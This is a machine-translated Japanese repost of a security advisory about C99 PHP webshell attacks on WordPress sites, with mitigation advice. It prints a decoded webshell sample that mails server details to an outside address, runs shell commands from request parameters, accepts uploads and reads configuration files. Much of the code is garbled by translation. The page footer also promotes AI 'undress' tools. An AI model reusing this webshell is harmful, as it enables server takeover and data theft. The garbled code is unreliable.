検索
ホームページバックエンド開発PHPチュートリアルwordpress c99 php webshel​​l攻撃が激化 Anheng Mingyu APT早期警告プラットフォーム webshel​​l監査アラーム

wordpress c99 php Webshel​​l 攻撃が激化、安恒明裕 APT 早期警告プラットフォーム Webshel​​l 監査アラーム

最近、IBM のマネージド セキュリティ サービス (MSS) チームは、次のような使用が検出されたと警告を発しました。 C99 php webshel​​l により、多数の WordPress サイトが新たな攻撃を受けており、WordPress サイト管理者はサイトの脆弱性を適時にスキャンして修復する必要があることがわかりました。

セキュリティ研究者は、IBM MSS チームによる悪意のあるイベントの長期監視と分析に基づいて、過去 2 か月間、C99 Web シェルによって引き起こされたトラフィック異常が発生していることを発見したと報告されています。 2月に監視されたイベントの数は404件でしたが、3月には588件に達しました。詳細は次のとおりです。

詳細なニュースについては、

を参照してください。 https://securityintelligence.com/got-wordpress-php- c99-webshel​​l-attachs-increasing/

安恒研究所は Google 検索を通じて c99 Webshel​​l サンプルを収集しました

復号化後、

error_reporting ( 0 ) ; isset ( $_SESSION [ 'bajak' ] )) {

$visitcount = 0 ;

$web = $_SERVER [ 'HTTP_HOST' ] ;

$inj = $_SERVER [ 'REQUEST_URI' ] ; >

$body = "ada yang inject n { $web }{ $inj }" ;

$safem0de = @ ini_get ( 'safe_mode' ) ; $safem0de ) {

$security = 'SAFE_MODE = OFF ' ;

} else {

$security = 'SAFE_MODE = ON'

}

$serper = gethostbyname ( $_SERVER [ 'SERVER_ADDR' ]) ;

$injektor = gethostbyname ( $_SERVER [ 'REMOTE_ADDR' ]) ;

メール ( 'cumicd@gmail) .com' , "{ $body }" , "ハシル バジャカン http://{ $web }{ $inj } n { $security } n IP サーバー = { $serper } n IP インジェクター = { $injektor }" ) ;

$_SESSION [ 'bajak' ] = 0 ;

} else {

$_SESSION [ 'bajak' ] ++ ; >

if ( isset ( $_GET [ 'clone' ] )) {

$source = $_SERVER [ 'SCRIPT_FILENAME' ] ;

$desti = $_SERVER [ 'DOCUMENT_ROOT' ] . '/images/stories/food/footer.php' ;

名前変更 ( $source , $desti ) ;

$safem0de ( 'セーフモード' ) ;

if ( ! $safem0de ) {

$security = 'SAFE_MODE : OFF' ;

$security = 'SAFE_MODE : ON' ;

}

echo '

/title><br>' <p> echo '<b>' ; </b></p> <p> $cur_user = '(' . get_current_user ( ) ' ; 🎜> </p> echo '<font size="2" color="#888888"><b>user: uid=' . $cur_user . $cur_user ' /b><br> ; </b><p> </p> echo '<font size="2" color="#888888"><b>Uname '</b><br> ' ; <p> </p> function pwd ( ) <p> </p> $cwd = getcwd ( ) ; <p> </p> if ( $u = strrpos ( $cwd , '/ ' )) { <p> </p> if ( $u ! = strlen ( $cwd ) – 1 ) { <p> </p> return $cwd . <p> </p> } else { <p> </p> return $cwd ; <p> </p> } <p> </p> } elseif ( $u = strrpos ( $cwd , ' \ ' )) { <p> </p> if ( $u != strlen ( $cwd ) – 1 ) { <p> </p> return $cwd ; <p> </p> } else { <p> </p> return $cwd '<font size="2" color="#888888"><b>コマンド</b><br><input type="”" text name="”cmd”>" value="”Crotz”">'<p> echo '</p> <form enctype="”multipart/form-data”" action method="POST"> <font size="2" color="#888888"><b>ファイルをアップロード</b></font><input type="hidden" name="”submit”"><input type="file" name="”userfile”" size="28"><br><font size="2" color="#888888"><b>新規name: </b></font><input type="text" size="15" name="”newname”" class="ta">><input type="submit" class="”bt”" value="”Upload" bos>; <p> if ( isset ( $_POST [ ‘submit’ ])) { </p> <p> $uploaddir = pwd ( ) ; </p> <p> if ( ! ( $name = $_POST [ ‘newname’ ])) { </p> <p> $name = $_FILES [ ‘userfile’ ] [ ‘name’ ] ; </p> <p> } </p> <p> move_uploaded_file ( $_FILES [ ‘userfile’ ] [ ‘tmp_name’ ] , $uploaddir . $name ) ; </p> <p> if ( move_uploaded_file ( $_FILES [ ‘userfile’ ] [ ‘tmp_name’ ] , $uploaddir . $name )) { </p> <p> echo ‘アップロード GAGAL!!!’ ; </p> <p> } else { </p> <p> echo ‘アップロードに成功しました’ 。  $uploaddir 。  $name 。  「 :P 」 ; </p> <p> } </p> <p> } </p> <p> if ( isset ( $_POST [ 'command' ])) { </p> <p> $cmd = $_POST [ 'cmd' ] ; </p> <p> 「</p> <pre class="brush:php;toolbar:false"><font size="3" color="#000000">」 をエコーし​​ます。  シェル_exec ($cmd) 。  「</font></pre>」 ; <p> } elseif ( isset ( $_GET [ ‘cmd’ ])) { </p> <p> $comd = $_GET [ ‘cmd’ ] ; </p> <p> 「</p> <pre class="brush:php;toolbar:false"><font size="3" color="#000000">」 をエコーし​​ます。  シェル_exec ($comd) 。  「</font></pre>」 ; <p> } elseif ( isset ( $_GET [ ‘rf’ ])) { </p> <p> $rf = file_get_contents ( ‘../../configuration.php’ ) ; </p> <p> echo $rf ; </p> <p> } else { </p> <p> echo ‘</p> <pre class="brush:php;toolbar:false"><font size="3" color="#000000">’ 。  shell_exec ( ‘ls -la’ ) 。  「</font></pre>」 ; <p> } </p> <p>?></p> <p> 进一步分析受害wordpress情况発行现 </p> <p> </p> <p> https://www.google.com.hk/?gws_rd=ssl #safe=strict&q=pagat+shell </p> <p> </p> <p> Webshel​​l 攻撃者は服务器上で终端コマンドまたは新しい文をステーションポイントに転送できます。より攻撃性の高い Web シェル、DDoS ゲスト端末、またはその他の恶意软件 </p> <p> </p> <p>IBM MSS 团队称、截まで 2016 年 4 月 12 日、Google 検索経由引擎简单查询,就播现其中に有32000个WordPress站点存在pagat.txt文件</p> <p>apt预警平台能够实時监测到并告警c99的webshel​​lも逃走可能警平台事前に準備された報告警機能は、最初の時点での Web シェル攻撃の実行を支援します。</p> <p> </p> <p>安全構築:</p> <p> 現在の状況に基づいて、構築ステーション ポイント管理は次のように実行できます。オペレーション、</p> <p>1、php.ini ファイル、base64 デコード機能を無効にします。php.ini ファイルで、関連する構成句「disable_functions =」を検出し、この句を「disable_functions = eval、base64_decode, gzinflate」に設定します。 ”;</p> <p>2、上流ファイルの名前を変更します。WordPress では、上流プログラムを介して上流ファイルにファイルを書き込むことを許可しています。ユーザーがまだ承認名を使用している場合、攻撃者は上流ファイルの特定のパスを容易に推すことができます。攻撃者がシェル スクリプトを含む PHP ファイルのサイズを小さくできるようにします。</p> <p>3、wordfence WordPress プラグインなど、一項使用可能なセキュリティ ファイルをインストールします。</p> <p>4、安全スキャンを実行します。建议使用开源扫描ツール,对上传文件全量扫走査,此処可使用扫描ツールModsecurity,同時にAWVS或はWordPress安全扫走器对站点进行扫走,及時公開现漏洞,并进行修复加固;</p> <p>5、ステーション・ポイントが感染したことが判明した場合、ステーション・ポイントのすべての管理鍵が更新され、ステーション・ポイントのユーザに暗号の変更を行うよう通知されます。</p> </form></font></font></font>
声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
Laravelでフラッシュセッションデータを使用しますLaravelでフラッシュセッションデータを使用しますMar 12, 2025 pm 05:08 PM

Laravelは、直感的なフラッシュメソッドを使用して、一時的なセッションデータの処理を簡素化します。これは、アプリケーション内に簡単なメッセージ、アラート、または通知を表示するのに最適です。 データは、デフォルトで次の要求のためにのみ持続します。 $リクエスト -

PHPのカール:REST APIでPHPカール拡張機能を使用する方法PHPのカール:REST APIでPHPカール拡張機能を使用する方法Mar 14, 2025 am 11:42 AM

PHPクライアントURL(CURL)拡張機能は、開発者にとって強力なツールであり、リモートサーバーやREST APIとのシームレスな対話を可能にします。尊敬されるマルチプロトコルファイル転送ライブラリであるLibcurlを活用することにより、PHP Curlは効率的なexecuを促進します

Laravelテストでの簡略化されたHTTP応答のモッキングLaravelテストでの簡略化されたHTTP応答のモッキングMar 12, 2025 pm 05:09 PM

Laravelは簡潔なHTTP応答シミュレーション構文を提供し、HTTP相互作用テストを簡素化します。このアプローチは、テストシミュレーションをより直感的にしながら、コード冗長性を大幅に削減します。 基本的な実装は、さまざまな応答タイプのショートカットを提供します。 Illuminate \ support \ facades \ httpを使用します。 http :: fake([[ 'google.com' => 'hello world'、 'github.com' => ['foo' => 'bar']、 'forge.laravel.com' =>

Codecanyonで12の最高のPHPチャットスクリプトCodecanyonで12の最高のPHPチャットスクリプトMar 13, 2025 pm 12:08 PM

顧客の最も差し迫った問題にリアルタイムでインスタントソリューションを提供したいですか? ライブチャットを使用すると、顧客とのリアルタイムな会話を行い、すぐに問題を解決できます。それはあなたがあなたのカスタムにより速いサービスを提供することを可能にします

PHPロギング:PHPログ分析のベストプラクティスPHPロギング:PHPログ分析のベストプラクティスMar 10, 2025 pm 02:32 PM

PHPロギングは、Webアプリケーションの監視とデバッグ、および重要なイベント、エラー、ランタイムの動作をキャプチャするために不可欠です。システムのパフォーマンスに関する貴重な洞察を提供し、問題の特定に役立ち、より速いトラブルシューティングをサポートします

PHPにおける後期静的結合の概念を説明します。PHPにおける後期静的結合の概念を説明します。Mar 21, 2025 pm 01:33 PM

記事では、PHP 5.3で導入されたPHPの後期静的結合(LSB)について説明し、より柔軟な継承を求める静的メソッドコールのランタイム解像度を可能にします。 LSBの実用的なアプリケーションと潜在的なパフォーマ

フレームワークのカスタマイズ/拡張:カスタム機能を追加する方法。フレームワークのカスタマイズ/拡張:カスタム機能を追加する方法。Mar 28, 2025 pm 05:12 PM

この記事では、フレームワークにカスタム機能を追加し、アーキテクチャの理解、拡張ポイントの識別、統合とデバッグのベストプラクティスに焦点を当てています。

See all articles

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

AtomエディタMac版ダウンロード

AtomエディタMac版ダウンロード

最も人気のあるオープンソースエディター

Dreamweaver Mac版

Dreamweaver Mac版

ビジュアル Web 開発ツール

Safe Exam Browser

Safe Exam Browser

Safe Exam Browser は、オンライン試験を安全に受験するための安全なブラウザ環境です。このソフトウェアは、あらゆるコンピュータを安全なワークステーションに変えます。あらゆるユーティリティへのアクセスを制御し、学生が無許可のリソースを使用するのを防ぎます。

DVWA

DVWA

Damn Vulnerable Web App (DVWA) は、非常に脆弱な PHP/MySQL Web アプリケーションです。その主な目的は、セキュリティ専門家が法的環境でスキルとツールをテストするのに役立ち、Web 開発者が Web アプリケーションを保護するプロセスをより深く理解できるようにし、教師/生徒が教室環境で Web アプリケーションを教え/学習できるようにすることです。安全。 DVWA の目標は、シンプルでわかりやすいインターフェイスを通じて、さまざまな難易度で最も一般的な Web 脆弱性のいくつかを実践することです。このソフトウェアは、

mPDF

mPDF

mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。